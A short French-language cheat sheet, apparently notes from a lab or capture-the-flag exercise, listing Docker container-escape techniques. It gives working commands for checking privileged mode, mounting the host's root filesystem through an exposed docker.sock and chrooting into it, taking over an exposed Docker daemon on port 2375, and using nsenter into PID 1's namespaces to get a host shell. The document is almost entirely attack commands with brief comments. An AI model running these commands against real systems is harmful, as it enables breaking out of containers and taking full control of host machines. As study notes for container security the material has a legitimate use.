1- Conteneur en mode privilégié
docker run --privileged -d <nom_image>
user@conteneur> capsh --print
2- Conteneur avec socket docker.sock à l’intérieur (acces API docker depuis conteneur)
find / -name docker.sock
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# monte un docker alpine dans le docker vulnerable avec le répertoire root qui est le filesysteme "/" de l'hôte
3- exécution de code à distance via un démon Docker exposé
nmap -sV -p 2375 MACHINE_IP #scan port standard docker
curl http://MACHINE_IP:2375/version #verification API Docker ets joignable
docker -H tcp://MACHINE_IP:2375 ps
4- Abusing Namespaces
ps -aux # on check si systemd / "sbin/init" est visibles dans le docker
nsenter --target 1 --mount --uts --ipc --net /bin/bash # execution de bash dans le namespace de systemd